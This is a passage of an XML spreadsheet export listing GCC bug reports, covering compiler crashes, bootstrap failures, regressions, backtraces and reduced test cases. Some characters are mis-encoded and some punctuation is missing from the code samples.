    <t>ICE: verify_flow_info failed: control flow in the middle of basic block with -fprefetch-loop-arrays --param l2-cache-size=0 and setjmp()</t>
  </si>
  <si>
    <t>Created attachment 23875
reduced testcase
Compiler output:
$ gcc -O -fprefetch-loop-arrays -fstrict-overflow -ftree-vectorize --param l2-cache-size=0 testcase.c
testcase.c: In function 'foo':
testcase.c:3:6: error: control flow in the middle of basic block 10
testcase.c:3:6: error: control flow in the middle of basic block 10
testcase.c:3:6: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  error (gmsgid=0x1178ef8 control flow in the middle of basic block %d) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:747
#1  0x00000000008e98d3 in gimple_verify_flow_info () at /mnt/svn/gcc-trunk/gcc/tree-cfg.c:4464
#2  0x00000000005e6374 in verify_flow_info () at /mnt/svn/gcc-trunk/gcc/cfghooks.c:257
#3  0x00000000009aee9a in tree_transform_and_unroll_loop (loop=0x7ffff7ed0a18 factor=4 exit=0x7ffff59983c0 desc=Unhandled dwarf expression opcode 0xf3
)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-loop-manip.c:1098
#4  0x000000000105d709 in loop_prefetch_arrays () at /mnt/svn/gcc-trunk/gcc/tree-ssa-loop-prefetch.c:1862
#5  tree_ssa_prefetch_arrays () at /mnt/svn/gcc-trunk/gcc/tree-ssa-loop-prefetch.c:1933
#6  0x00000000007efd46 in execute_one_pass (pass=0x164b520) at /mnt/svn/gcc-trunk/gcc/passes.c:1555
#7  0x00000000007f0035 in execute_pass_list (pass=0x164b520) at /mnt/svn/gcc-trunk/gcc/passes.c:1610
#8  0x00000000007f0047 in execute_pass_list (pass=0x164bac0) at /mnt/svn/gcc-trunk/gcc/passes.c:1611
#9  0x00000000007f0047 in execute_pass_list (pass=0x164ad40) at /mnt/svn/gcc-trunk/gcc/passes.c:1611
#10 0x0000000000934d15 in tree_rest_of_compilation (fndecl=0x7ffff5977f00) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:422
#11 0x0000000000b01337 in cgraph_expand_function (node=0x7ffff5997000) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1580
#12 0x0000000000b03a8c in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1639
#13 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1903
#14 0x0000000000b0401a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1100
#15 0x0000000000509094 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:9879
#16 0x00000000008dd94d in compile_file (argc=18 argv=0x7fffffffdbf8) at /mnt/svn/gcc-trunk/gcc/toplev.c:591
Tested revisions:
r171948 - crash
4.6 r171597 - crash
4.5 r171597 - OK
4.4 r171597 - crash</t>
  </si>
  <si>
    <t>GCC-48288</t>
  </si>
  <si>
    <t>[4.7 Regression] ld: Unsatisfied symbol __iordi3 in file /test/gnu/gcc/objdir/./gcc/libgcc_eh.a</t>
  </si>
  <si>
    <t>checking for C compiler default output file name...
configure: error: in `/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libgomp':
configure: error: C compiler cannot create executables
See `config.log' for more details.
make[2]: *** [configure-stage1-target-libgomp] Error 77
make[2]: Leaving directory `/test/gnu/gcc/objdir'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/test/gnu/gcc/objdir'
make: *** [bootstrap] Error 2
# ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa64-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu64/bin/as --wi th-ld=/usr/ccs/bin/ld --enable-shared --with-local-prefix=/opt/gnu64 --prefix=/o pt/gnu64/gcc/gcc-4.6.0 --build=hppa64-hp-hpux11.11 --enable-threads=posix --disa ble-nls --with-gmp=/opt/gnu64/gcc/gcc-4.6.0 --with-libelf=/opt/gnu64 --enable-la nguages=cc++objcobj-c++fortranlto
Thread model: posix
gcc version 4.7.0 20110324 (experimental) [trunk revision 171429] (GCC)</t>
  </si>
  <si>
    <t>GCC-31934</t>
  </si>
  <si>
    <t>[h8300] bad dwarf frame base data</t>
  </si>
  <si>
    <t>I'm seeing differences between the DWARF data being generated by gcc 3.4.6 and 4.1.2.
Compiling the following (-g -mno-quickcall):
int f(int a)
{
    return a
}
generates the following code (in both 3.4.6 and 4.1.2):
00000000 :
   0:   6d f6           mov.w   r6@-r7
   2:   0d 76           mov.w   r7r6
00000004 :
   4:   6f 62 00 04     mov.w   @(0x4:16r6)r2
00000008 :
   8:   0d 20           mov.w   r2r0
   a:   6d 76           mov.w   @r7+r6
   c:   54 70           rts
But looking at the DWARF data this is what 3.4.6 produces:
 : Abbrev Number: 2 (DW_TAG_subprogram)
     DW_AT_name        : f
     DW_AT_frame_base  : 1 byte block: 56       (DW_OP_reg6)
: Abbrev Number: 3 (DW_TAG_formal_parameter)
     DW_AT_name        : a
     DW_AT_location    : 2 byte block: 91 4     (DW_OP_fbreg: 4)
This means variable 'a' can be found at the address contained in r6 (frame pointer) + 4 right? Both gdb and our internal debugger recognizes this and extracts the correct value for 'a'.
4.1.2 however generates this:
: Abbrev Number: 2 (DW_TAG_subprogram)
     DW_AT_name        : f
     DW_AT_frame_base  : 1 byte block: 57       (DW_OP_reg7)
: Abbrev Number: 3 (DW_TAG_formal_parameter)
     DW_AT_name        : a
     DW_AT_location    : 2 byte block: 91 0     (DW_OP_fbreg: 0)
which translates to the address contained in r7 (stack pointer) + 0. To me this does not make sense as the stack pointer will point to the old frame pointer (in this particular case). So loading the value from this address will load the old frame pointer instead of 'a'. Needless to say both gdb and our own debugger has problems with this file gdb doesn't even get a correct stack trace.</t>
  </si>
  <si>
    <t>ekloef</t>
  </si>
  <si>
    <t>GCC-32029</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 regression] ICE on instantiation of template parameter</t>
  </si>
  <si>
    <t>When there is a default template parameter based on a templated class member type the compiler dies a nasty death.  As far as I can tell gcc prior to 4.1 branch works fine but all of the 4.1 branch seems to have this problem.
Quick summary... This works:
  template::template Factory &gt; class thing {/*...*/}
This ICEs:
  template::Factory &gt; class thing {/*...*/}
whenever you try to instantiate 'thing' as seen below:
$ g++ -Wall bug.cc -o bug
bug.cc: In instantiation of â€˜Factory0Arg::Factoryâ€™:
bug.cc:41:   instantiated from â€˜void thing::makeIt() [with T = foo Al = Factory0Arg::Factory]â€™
bug.cc:53:   instantiated from here
bug.cc:19: internal compiler error: in instantiate_class_template at cp/pt.c:5666
I would at least hope for a better error message assuming that's not valid syntax )
I'll attach original and preprocessed source.</t>
  </si>
  <si>
    <t>GCC-39107</t>
  </si>
  <si>
    <t>Building an i686-pc-linux-gnu -&gt; i686-pc-mingw32 crosscompiler fails on libstdc++ configure</t>
  </si>
  <si>
    <t>configuring libstdc++ in an i686-pc-linux-gnu-&gt;i686-pc-mingw32 crosscompiler fails with
checking for ld that supports -Wl--gc-sections... configure: error: Link tests are not allowed after GCC_NO_EXECUTABLES.
make[1]: *** [configure-target-libstdc++-v3] Error 1</t>
  </si>
  <si>
    <t>GCC-79904</t>
  </si>
  <si>
    <t>ICE in annotate_constant_pool_refs at config/s390/s390.c:7909</t>
  </si>
  <si>
    <t>We ICE on following target (with cross-compiler):
$ s390x-linux-gnu-gcc /home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr59261.c -fsanitize=undefined
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr59261.c: In function â€˜fooâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr59261.c:11:1: internal compiler error: in annotate_constant_pool_refs at config/s390/s390.c:7909
 }
 ^
0xe74d05 annotate_constant_pool_refs
	.././../gcc/config/s390/s390.c:7908
0xe74cdb annotate_constant_pool_refs
	.././../gcc/config/s390/s390.c:7992
0xe74cdb annotate_constant_pool_refs
	.././../gcc/config/s390/s390.c:7992
0xe74cdb annotate_constant_pool_refs
	.././../gcc/config/s390/s390.c:7992
0xe8ab19 execute
	.././../gcc/config/s390/s390.c:10819</t>
  </si>
  <si>
    <t>GCC-55859</t>
  </si>
  <si>
    <t>Mention -Og/-Ofast in error: argument to '-O' should be a non-negative integer</t>
  </si>
  <si>
    <t>The following error is misleading as also -Ofast and -Og are allowed.
gcc -OFast foo.c
cc1: error: argument to '-O' should be a non-negative integer
Expected: Something like argument to '-O' should be a non-negative integer 'g' or 'fast'.
(Mentioned at http://gcc.gnu.org/ml/fortran/2013-01/msg00014.html)</t>
  </si>
  <si>
    <t>GCC-1115</t>
  </si>
  <si>
    <t>Source parser break causes incorrect exit in some nested for-loops</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: This appears to be fixed in recent snapshots.
    I've added a test case for this just in case it shows up
    again. libgcj/testsuite/libjava.lang/pr109.java.
</t>
  </si>
  <si>
    <t>warg</t>
  </si>
  <si>
    <t>GCC-53767</t>
  </si>
  <si>
    <t>ICE deriving from class wide generic access parameter</t>
  </si>
  <si>
    <t>Introduced in gcc-4.7 still present in mainline.
$ gcc-4.7 -c p.ads
+===========================GNAT BUG DETECTED==============================+
| 4.7.1 20120603 (prerelease) (x86_64-unknown-linux-gnu) Assert_Failure sinfo.adb:730|
| Error detected at p.ads:5:4                                              |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
Consider also -gnatd.n switch (see debug.adb).
p.ads
g.ads
compilation abandoned
-- chop here --
generic
   type T is tagged private
   type P is access T'Class
package G is
   type NP is new P
end
with G
package P is
   type T is tagged null record
   type P is access T'Class
   package GI is new G (T P)
end</t>
  </si>
  <si>
    <t>GCC-1929</t>
  </si>
  <si>
    <t>template nested class problem</t>
  </si>
  <si>
    <t>I made a few time ago a template class for doublylinked list.
I made it using smart pointer. The organization of the class
was made as follow :
template  list
{
	class cell
	{
		//body
	}
	class head //class storing the list head adress with the smart ptr
	{
		//body
	}
	public:
	//body class list
	class parc //stepper class for the list
}
As you know using data structure is often leading you to sort it
So I wanted to do some quicksort algorithm using my class. 
What was my surprise when I saw that using directly the list::parc made my compiler 
bugging.
Release:
2.94.x
Environment:
HPUX 10.20 and Linux (mandrake version 6.1)</t>
  </si>
  <si>
    <t>x.lsi.maillard</t>
  </si>
  <si>
    <t>GCC-3457</t>
  </si>
  <si>
    <t>enable-version-specific-runtime-libs vs. gxx-include-dir</t>
  </si>
  <si>
    <t>configure --enable-version-specific-runtime-libs --gxx-include-dir=PATH
generates a Makefile where the value of --gxx-include-dir
is simply ignored. This causes make install
to put all C++ include files to the libsubdir/include while
the prepocessor looks for them at the specified PATH.
This contradicts the INSTALL docs and the behavior of former
releases (such as 2.95.x)
Release:
3.0
Environment:
UltraSPARC Solaris 2.8
How-To-Repeat:
configure and install gcc with both options mentioned above</t>
  </si>
  <si>
    <t>GCC-32398</t>
  </si>
  <si>
    <t>[4.3 Regression] checking for suffix of object files... configure: error: cannot compute suffix of f object files: cannot compile</t>
  </si>
  <si>
    <t>checking for hppa64-hp-hpux11.11-gcc... /test/gnu/gcc/objdir/./gcc/xgcc -B/test/
gnu/gcc/objdir/./gcc/ -B/opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/bin/ -B/opt
/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/lib/ -isystem /opt/gnu64/gcc/gcc-4.3.0/
hppa64-hp-hpux11.11/include -isystem /opt/gnu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.1
1/sys-include
checking for suffix of object files... configure: error: cannot compute suffix o
f object files: cannot compile
See `config.log' for more details.
make[2]: *** [configure-stage2-target-libgcc] Error 1
make[2]: Leaving directory `/test/gnu/gcc/objdir'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/test/gnu/gcc/objdir'
make: *** [bootstrap] Error 2
Mon Jun 18 21:08:30 EDT 2007</t>
  </si>
  <si>
    <t>GCC-12283</t>
  </si>
  <si>
    <t>profiledbootstrap fails (file resource.gcda not found)</t>
  </si>
  <si>
    <t>HEAD 3.4 CVS as of this bug report.
stage1/xgcc -Bstage1/ -B/usr/local/gcc-cvs//i686-pc-linux-gnu/bin/ -c   -g -O2
-fbranch-probabilities -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes
-Wmissing-prototypes -pedantic -Wno-long-long -Werror    -DHAVE_CONFIG_H    -I.
-I. -I../../gcc -I../../gcc/. -I../../gcc/../include  ../../gcc/c-decl.c -o c-decl.o
../../gcc/c-decl.c: In function `duplicate_decls':
../../gcc/c-decl.c:1508: error: corrupted profile info: number of executions for
edge 31-32 thought to be -1734566912
../../gcc/c-decl.c:1508: error: corrupted profile info: number of executions for
edge 31-33 thought to be 1734584410
RH8 Linux on x86.</t>
  </si>
  <si>
    <t>levon</t>
  </si>
  <si>
    <t>GCC-60079</t>
  </si>
  <si>
    <t>[4.9 Regression] [LRA] ICE when compiling attached case.</t>
  </si>
  <si>
    <t>When the attached case is compiled with -O2 for AArch64 LRA ICEs thus:
$ ../install/bin/aarch64-none-elf-gcc -O2 besttry.c -c
besttry.c: In function 'ripemd160_block_data_order':
besttry.c:936:1: internal compiler error: in update_reg_eliminate at lra-eliminations.c:1157
 }
 ^
0x899638 update_reg_eliminate
        /work/aarch64/src/svn-trunk//gcc/gcc/lra-eliminations.c:1157
0x89ad3c lra_eliminate(bool bool)
        /work/aarch64/src/svn-trunk//gcc/gcc/lra-eliminations.c:1387
0x897436 lra_constraints(bool)
        /work/aarch64/src/svn-trunk//gcc/gcc/lra-constraints.c:3974
0x8863bc lra(_IO_FILE*)
        /work/aarch64/src/svn-trunk//gcc/gcc/lra.c:2339
0x849f96 do_reload
        /work/aarch64/src/svn-trunk//gcc/gcc/ira.c:5457
0x84ac38 rest_of_handle_reload
        /work/aarch64/src/svn-trunk//gcc/gcc/ira.c:5598
0x84ac38 execute
        /work/aarch64/src/svn-trunk//gcc/gcc/ira.c:5627
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
My configure:
.../gcc/configure --target=aarch64-none-elf --prefix=.../install --with-gmp=.../host-tools --with-mpfr=.../host-tools --with-mpc=.../host-tools --with-pkgversion=unknown --disable-shared --disable-nls --disable-threads --disable-tls --enable-checking=yes --enable-languages=cc++ --with-newlib
Sorry I couldn't reduce the test case any further - commenting any line in besttry.c makes the ICE go away.</t>
  </si>
  <si>
    <t>GCC-55334</t>
  </si>
  <si>
    <t>[4.9 Regression] mgrid regression (ipa-cp disables vectorization)</t>
  </si>
  <si>
    <t>mgrid has regressed noticeably http://gcc.opensuse.org/SPEC/CFP/sb-frescobaldi.suse.de-head-64/172_mgrid_big.png
This seems to be related to function resid_ that we now clone
  Creating a specialized node of resid/1.
    replacing param u with const &amp;x.u
    replacing param v with const &amp;x.v
    replacing param r with const &amp;x.r
    replacing param a with const &amp;x.a
Both variants stays in the code. When compiling resid vectorizer succeeds.
The difference seems to be:
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *v_41(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: *u_45(D)
being changed to
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: x
191: vect_compute_data_ref_alignment:
191: misalign = 0 bytes of ref MEM[(real(kind=8)[4] *)&amp;x + 58071104B][0]
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: x
191: vect_compute_data_ref_alignment:
191: misalign = 8 bytes of ref MEM[(real(kind=8)[4] *)&amp;x + 58071104B][1]
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: x
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: x
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: x
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: x
191: vect_compute_data_ref_alignment:
191: Unknown alignment for access: x
that ultimately leads to
191: === vect_prune_runtime_alias_test_list ===
191: disable versioning for alias - max number of generated checks exceeded.
191: too long list of versioning for alias run-time tests.
So it seems that specializing for particular static array = good thing leads to vectorizer giving up.</t>
  </si>
  <si>
    <t>GCC-29889</t>
  </si>
  <si>
    <t>jc1 segfaults while bootstrap</t>
  </si>
  <si>
    <t>[...]
/src/gcc-2006.11.16/build/gcc/gcj -B/src/gcc-2006.11.16/build/alphaev68-unknown-linux-gnu/libjava/ -B/src/gcc-2006.11.16/build/gcc/ -mieee -fclasspath= -fbootclasspath=/src/gcc-2006.11.16/build/alphaev68-unknown-linux-gnu/libjava/classpath/lib --encoding=UTF-8 -Wno-deprecated -fbootstrap-classes -g -O2 -fjni -findirect-dispatch -fno-indirect-classes -c @gnu-CORBA.list -fPIC -o .libs/gnu-CORBA.o
gnu/CORBA/CDR/gnuRuntime.java: In class 'gnu.CORBA.CDR.gnuRuntime$Redirection':
gnu/CORBA/CDR/gnuRuntime.java: In method 'gnu.CORBA.CDR.gnuRuntime$Redirection.toString()':
gnu/CORBA/CDR/gnuRuntime.java:95: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [gnu-CORBA.lo] Error 1
make[3]: Leaving directory `/src/gcc-2006.11.16/build/alphaev68-unknown-linux-gnu/libjava'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/src/gcc-2006.11.16/build/alphaev68-unknown-linux-gnu/libjava'
make[1]: *** [all-target-libjava] Error 2
make[1]: Leaving directory `/src/gcc-2006.11.16/build'
make: *** [bootstrap] Error 2
falk@juist:/src/gcc-2006.11.16/build/alphaev68-unknown-linux-gnu/libjava% gdb ../../gcc/jc1
GNU gdb 6.5-debian
Copyright (C) 2006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alpha-linux-gnu...Using host libthread_db library /lib/libthread_db.so.1.
(gdb) r /tmp/cckTVEkLjx -fhash-synchronization -fuse-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -mieee -fkeep-inline-functions -quiet -dumpbase ccWKKQvWjx -mieee -mcpu=ev67 -auxbase-strip .libs/gnu-CORBA.o -g -O2 -Wno-deprecated -version -ffilelist-file -fclasspath= -fbootclasspath=/src/gcc-2006.11.16/build/alphaev68-unknown-linux-gnu/libjava/classpath/lib -fencoding=UTF-8 -fbootstrap-classes -fjni -findirect-dispatch -fno-indirect-classes -fPIC -o /tmp/ccQxnArK.s
Starting program: /src/gcc-2006.11.16/build/gcc/jc1 /tmp/cckTVEkLjx -fhash-synchronization -fuse-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -mieee -fkeep-inline-functions -quiet -dumpbase ccWKKQvWjx -mieee -mcpu=ev67 -auxbase-strip .libs/gnu-CORBA.o -g -O2 -Wno-deprecated -version -ffilelist-file -fclasspath= -fbootclasspath=/src/gcc-2006.11.16/build/alphaev68-unknown-linux-gnu/libjava/classpath/lib -fencoding=UTF-8 -fbootstrap-classes -fjni -findirect-dispatch -fno-indirect-classes -fPIC -o /tmp/ccQxnArK.s
GNU Java version 4.3.0 20061116 (experimental) (alphaev68-unknown-linux-gnu)
        compiled by GNU C version 4.3.0 20061116 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Class path starts here:
    ./
    /src/gcc-2006.11.16/build/alphaev68-unknown-linux-gnu/libjava/classpath/lib/ (system)
Program received signal SIGSEGV Segmentation fault.
add_type_assertion (class= assertion_code= op1=0x20000473a20 
    op2=) at ../../gcc/java/expr.c:477
477       **(type_assertion **)as_pp = as
(gdb) bt
#0  add_type_assertion (class= assertion_code= op1=0x20000473a20 
    op2=) at ../../gcc/java/expr.c:477
#1  0x00000001200893ac in vfy_is_assignable_from (target=0x1 source=0x18) at ../../gcc/java/verify-glue.c:246
#2  0x000000012008af50 in types_compatible (t= k=)
    at ../../gcc/java/verify-impl.c:376
#3  0x000000012008b3a0 in vfy_pop_type_t (match={key = reference_type klass = 0x1207d2f90 pc = -2})
    at ../../gcc/java/verify-impl.c:1172
#4  0x000000012008d1a4 in verify_instructions () at ../../gcc/java/verify-impl.c:2913
#5  0x000000012008e9ec in verify_method (meth=0x11ffed210) at ../../gcc/java/verify-impl.c:3305
#6  0x0000000120088634 in verify_jvm_instructions_new (jcf=0x2000001eac8 byte_ops=0x1206cf50c Â» length=20)
    at ../../gcc/java/verify-glue.c:507
#7  0x000000012007eca4 in expand_byte_code (jcf=0x2000001eac8 method=) at ../../gcc/java/expr.c:3094
#8  0x0000000120091564 in parse_class_file () at ../../gcc/java/jcf-parse.c:955
#9  0x0000000120095d2c in java_parse_file (set_yydebug=) at ../../gcc/java/jcf-parse.c:1310
#10 0x000000012032a030 in toplev_main (argc= argv=) at ../../gcc/toplev.c:1033
#11 0x00000001200ad228 in main (argc=8609912 argv=0xafafafafafafafaf) at ../../gcc/main.c:35
(gdb)</t>
  </si>
  <si>
    <t>GCC-68979</t>
  </si>
  <si>
    <t>[6 Regression] error: left operand of shift expression â€˜(-1 &lt;&lt; 4)â€™ is negative</t>
  </si>
  <si>
    <t>markus@x4 tmp % cat enum.ii
enum A { bit_mask = ~(-1 &lt;&lt; 4) }
markus@x4 tmp % /usr/x86_64-pc-linux-gnu/gcc-bin/4.9.3/g++ -std=c++14 -Wall -Wextra -c enum.ii
markus@x4 tmp % /usr/x86_64-pc-linux-gnu/gcc-bin/5.3.1/g++ -std=c++14 -Wall -Wextra -c enum.ii
markus@x4 tmp % clang++ -std=c++14 -Wall -Wextra -c enum.ii
markus@x4 tmp % icpc -std=c++14 -Wall -Wextra -c enum.ii
markus@x4 tmp % g++ -Wall -Wextra -c enum.ii
enum.ii:1:29: warning: left shift of negative value [-Wshift-negative-value]
 enum A { bit_mask = ~(-1 &lt;&lt; 4) }
                             ^
enum.ii:1:26: error: left operand of shift expression â€˜(-1 &lt;&lt; 4)â€™ is negative
 enum A { bit_mask = ~(-1 &lt;&lt; 4) }
                      ~~~~^~~~~
enum.ii:1:30: error: enumerator value for â€˜bit_maskâ€™ is not an integer constant
 enum A { bit_mask = ~(-1 &lt;&lt; 4) }
                              ^</t>
  </si>
  <si>
    <t>GCC-61381</t>
  </si>
  <si>
    <t>constexpr non captured by template lambda</t>
  </si>
  <si>
    <t>cat ceLambda.cc 
struct Bar {  constexpr Bar(float i):f(i){} float f}
float foo1(float x) {
   constexpr Bar z{0}
   auto f = [=](auto a auto b) -&gt; Bar { return z}
   return f(xx).f
}
float foo2(float x) {
   const Bar z{0}
   auto f = [=](auto a auto b) -&gt; Bar { return z}
   return f(xx).f
}
float foo3(float x) {
   constexpr Bar z{0}
   auto f = [=](float a float b) -&gt; Bar { return z}
   return f(xx).f
}
b-d-128-141-131-42:ctest innocent$ c++ -O2 -std=c++1y -S ceLambda.cc 
ceLambda.cc: In instantiation of â€˜foo1(float):: [with auto:1 = float auto:2 = float]â€™:
ceLambda.cc:7:16:   required from here
ceLambda.cc:5:49: error: â€˜zâ€™ was not declared in this scope
    auto f = [=](auto a auto b) -&gt; Bar { return z}
                                                 ^</t>
  </si>
  <si>
    <t>GCC-32722</t>
  </si>
  <si>
    <t>[4.3 Regression] Bootstrap failure with -fno-tree-store-copy-prop</t>
  </si>
  <si>
    <t>Bootstrap fails compiling tree-ssa-structalias.c with a verify_ssa failure:
../../gcc/gcc/tree-ssa-structalias.c: In function 'build_pred_graph':
../../gcc/gcc/tree-ssa-structalias.c:940: error: definition in block 5 follows the use
for SSA_NAME: D.36231_29 in statement:
D.36230_26 = D.36231_29
../../gcc/gcc/tree-ssa-structalias.c:940: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
this doesn't reduce easily but with --param ggc-min-expand=0 --param ggc-min-heapsize=0 so this is likely GC related.  
See also PR32636 for a similar issue that got latent again.
Testcase is still reducing.</t>
  </si>
  <si>
    <t>GCC-32811</t>
  </si>
  <si>
    <t>Cannot flag inline assembler code noreturn</t>
  </si>
  <si>
    <t>For a function declared noreturn the compiler cannot verify that inline assembler code in the function body indeed does not return and therefore produces the warning 'noreturn' function does return. I would like a mechanism to tell the compiler that an inline assembler statement makes a function noreturn without the overhead of adding an endless loop at the end of the function. Something like: asm volatile (...) __attribute__((noreturn))
An example:
__attribute__((noreturn))
void func()
{
    asm volatile (1: jmp 1b)
}
int main()
{
    func()
    return 0
}</t>
  </si>
  <si>
    <t>GCC-84005</t>
  </si>
  <si>
    <t>[8 regression] gcc.dg/vect/bb-slp-1.c etc. FAIL</t>
  </si>
  <si>
    <t>Between 20170702 (r249882) and 20170703 (r249926) gcc.dg/vect/bb-slp-1.c started
to FAIL:
FAIL: gcc.dg/vect/bb-slp-1.c -flto -ffat-lto-objects  scan-tree-dump-times slp1 basic block vectorized 1 (found 0 times)
FAIL: gcc.dg/vect/bb-slp-1.c scan-tree-dump-times slp1 basic block vectorized 1 (found 0 times)
FAIL: gcc.dg/vect/bb-slp-16.c -flto -ffat-lto-objects  scan-tree-dump-times slp1 basic block vectorized 1 (found 0 times)
FAIL: gcc.dg/vect/bb-slp-16.c scan-tree-dump-times slp1 basic block vectorized 1 (found 0 times)
FAIL: gcc.dg/vect/bb-slp-2.c -flto -ffat-lto-objects  scan-tree-dump-times slp1 basic block vectorized 1 (found 0 times)
FAIL: gcc.dg/vect/bb-slp-2.c scan-tree-dump-times slp1 basic block vectorized 1 (found 0 times)
I'm seeing this on sparc-sun-solaris2.* but according to gcc-testresults postings
it also occurs on IA-64 and PowerPC.
  Rainer</t>
  </si>
  <si>
    <t>GCC-50831</t>
  </si>
  <si>
    <t>[4.7 regression] __gcc_register_frame must throw error when failed to load dll</t>
  </si>
  <si>
    <t>Running gcj-dbtool or gjar or any executable compiled with GCJ tag sigsegvs
/bin/sh ./libtool --tag=GCJ  --mode=link /tmp/gcc/host-i686-pc-cygwin/gcc/gcj -B/tmp/gcc/i686-pc-mingw32/libjava/ -B/tmp/gcc/host-i686-pc-cygwin/gcc/ -L/tmp/gcc/i686-pc-mingw32/winsup/mingw -L/tmp/gcc/i686-pc-mingw32/winsup/w32api/lib -isystem /tmp/gcc/winsup/mingw/include -isystem /tmp/gcc/winsup/w32api/include -B/usr/i686-pc-mingw32/bin/ -B/usr/i686-pc-mingw32/lib/ -isystem /usr/i686-pc-mingw32/include -isystem /usr/i686-pc-mingw32/sys-include --sysroot=/usr/i686-pc-mingw32/sys-root   -L/tmp/gcc/i686-pc-mingw32/libjava -ffloat-store -fomit-frame-pointer -Usun -fno-omit-frame-pointer -g -O2  -o gcj-dbtool.exe --main=gnu.gcj.tools.gcj_dbtool.Main -rpath /usr/i686-pc-mingw32/lib -shared-libgcc   gnu/gcj/tools/gcj_dbtool/natMain.o gnu/gcj/tools/gcj_dbtool.lo -L/tmp/gcc/i686-pc-mingw32/libjava/.libs libgcj.la
gdb --args .libs/gcj-dbtool.exe
(gdb) p klass-&gt;engine
$14 = (_Jv_ExecutionEngine *) 0x0
(gdb) p *klass
$15 = (java::lang::Class) {
   = {}
  members of java::lang::Class:
  static class$ = {
     = {}
    members of java::lang::Class:
    static class$ = 
    next_or_version = 0x0
    name = 0x6a04c874
    accflags = 0x31
    superclass = 0x69d57180
    constants = {
      size = 0x25
      tags = 0x69d57620 
      data = 0x69d57580
    }
    {
      methods = 0x69d57660
      element_type = 0x69d57660
    }
    method_count = 0x52
    vtable_method_count = 0x41
    fields = 0x0
---Type  to continue or q  to quit---
    size_in_bytes = 0x90
    field_count = 0x0
    static_field_count = 0x0
    vtable = 0x69d57468
    otable = 0x0
    otable_syms = 0x0
    atable = 0x0
    atable_syms = 0x0
    itable = 0x0
    itable_syms = 0x0
    catch_classes = 0x69d57cc8
    interfaces = 0x69d57ce0
    loader = 0x0
    interface_count = 0x4
    state = 0xe
    thread = 0x1
    depth = 0x1
    ancestors = 0xa64ff0
    {
      idt = 0xa68fc8
      ioffsets = 0xa68fc8
    }
    arrayclass = 0xa6ced8
---Type  to continue or q  to quit---
    protectionDomain = 0x0
    assertion_table = 0x0
    hack_signers = 0x0
    chain = 0x69e6c120
    aux_info = 0x0
    engine = 0x6a3a95c0
    reflection_data = 0x6a04c8a0 \001
  }
  next_or_version = 0x400635d8
  name = 0x4060bc
  accflags = 0x21
  superclass = 0x69d57180
  constants = {
    size = 0x32
    tags = 0x405420 
    data = 0x4052c0
  }
  {
    methods = 0x405460
    element_type = 0x405460
  }
  method_count = 0xa
  vtable_method_count = 0x6
---Type  to continue or q  to quit---
  fields = 0x405528
  size_in_bytes = 0x4
  field_count = 0x1
  static_field_count = 0x1
  vtable = 0x4051a8
  otable = 0x0
  otable_syms = 0x0
  atable = 0x0
  atable_syms = 0x0
  itable = 0x0
  itable_syms = 0x0
  catch_classes = 0x405538
  interfaces = 0x0
  loader = 0x0
  interface_count = 0x0
  state = 0x1
  thread = 0x0
  depth = 0x0
